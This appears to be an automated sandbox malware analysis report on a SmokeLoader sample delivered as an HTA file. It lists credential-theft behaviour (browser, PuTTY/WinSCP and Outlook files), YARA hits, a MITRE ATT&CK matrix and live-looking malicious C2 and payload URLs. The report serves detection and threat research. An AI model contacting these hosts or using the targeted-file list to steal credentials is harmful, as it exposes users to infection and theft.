Source: C:\Users\user\AppData\Roaming\icgfugf	Queries volume information: C:\Users\user\AppData\Roaming\icgfugf VolumeInformation
Source: C:\Users\user\AppData\Roaming\icgfugf	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02792112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,

17_2_02792112

Source: C:\Windows\explorer.exe

Code function: 14_2_01213490 GetUserNameW,

14_2_01213490

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02792198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

17_2_02792198

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829702.cde8135c-88c3-4c34-8670-7ef017742548.new-profile.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\background-update
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834620.c7889da7-33f0-4599-8452-58d47c58437b.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829744.7278f154-e8f4-4235-84c5-c5c1c6af0084.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1435a377-bbaf-4c9c-8706-0811a779fa3f
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\.metadata-v2
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\808127e8-e7ed-4078-b3f3-7f09061a011f
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.81ddb4cc-1d49-45f2-961f-e24ea6db2be5.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\12f997af-c065-4562-b9f6-11000bb95c9b
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834580.6fc53411-ad83-4cf6-a5f6-905f0f3f52e8.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1d5599c8-3f43-42cc-8163-9a43c60a06d1
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\78267ebf-1fb3-4b11-82e9-903e54a2a54e
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829746.67aa4432-87f8-463e-b422-f6679add9971.first-shutdown.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\6fc53411-ad83-4cf6-a5f6-905f0f3f52e8
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\7278f154-e8f4-4235-84c5-c5c1c6af0084
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\45e26519-596d-41a5-b290-e547b44111fd
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a5d6ec76-765c-4778-afd2-1e05a1554d8e
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\7d12ac42-15c3-4db9-abfe-259bc8d249ac
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\15f01145-7764-450b-9ad5-323693350a9c
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857833.45e26519-596d-41a5-b290-e547b44111fd.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.a73949a2-5a70-4025-8008-88156c16bb4a.event.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a7174184-f177-48c4-876a-8a51c2ed8fbc
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829737.9f7a5e7a-2be0-4ff7-b132-b1f6e59a8e58.event.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834608.65054280-9d54-477d-a3ea-afcb1f88e001.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\events
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\05d02ac8-b2f1-4670-8541-db8ec2bbf427
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857869.95af30ae-acac-4802-b983-233d7fd3cf34.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\3a40aaf9-3f8b-43a2-85e8-88e3ffc7666f
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\277ffbb3-8e94-4f3f-acac-7a401d130160
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834606.011115ff-9301-40fc-805e-ba07b7fdfce4.event.jsonlz4

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	11 Native API	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Exploitation for Client Execution	1 DLL Side-Loading	623 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	128 System Information Discovery	Distributed Component Object Model	11 Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	531 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	141 Virtualization/Sandbox Evasion	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	623 Process Injection	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
begoodforeverythinggreatthingsformebetterforgood.hta	10%	Virustotal		Browse
begoodforeverythinggreatthingsformebetterforgood.hta	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\icgfugf	0%	ReversingLabs

Source	Detection	Scanner	Label
http://prolinice.ga/	0%	Avira URL Cloud	safe
http://192.3.27.144/250/sweetnes	0%	Avira URL Cloud	safe
http://192.3.27.144/250/evenmegoodfor.txt	0%	Avira URL Cloud	safe
http://prolinice.ga/2:i	0%	Avira URL Cloud	safe
http://prolinice.ga/ndex.php	0%	Avira URL Cloud	safe
http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFI	0%	Avira URL Cloud	safe
http://prolinice.ga/j	0%	Avira URL Cloud	safe
http://prolinice.ga/index.phpMozilla/5.0	0%	Avira URL Cloud	safe
http://prolinice.ga/ll	0%	Avira URL Cloud	safe
http://prolinice.ga:80/index.phposoft	0%	Avira URL Cloud	safe
http://prolinice.ga/index.phpH	0%	Avira URL Cloud	safe
http://prolinice.ga/index.php	100%	Avira URL Cloud	malware
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0	0%	Avira URL Cloud	safe
http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIF	0%	Avira URL Cloud	safe
http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFLMEM	0%	Avira URL Cloud	safe
http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFuuC:	0%	Avira URL Cloud	safe
http://vilendar.ga/index.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
prolinice.ga	46.173.214.14	true	true		unknown
res.cloudinary.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://192.3.27.144/250/evenmegoodfor.txt	true	Avira URL Cloud: safe	unknown
http://prolinice.ga/index.php	true	Avira URL Cloud: malware	unknown
http://vilendar.ga/index.php	true	Avira URL Cloud: malware	unknown
http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIF	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
http://prolinice.ga/ndex.php	explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://192.3.27.144/250/sweetnes	powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
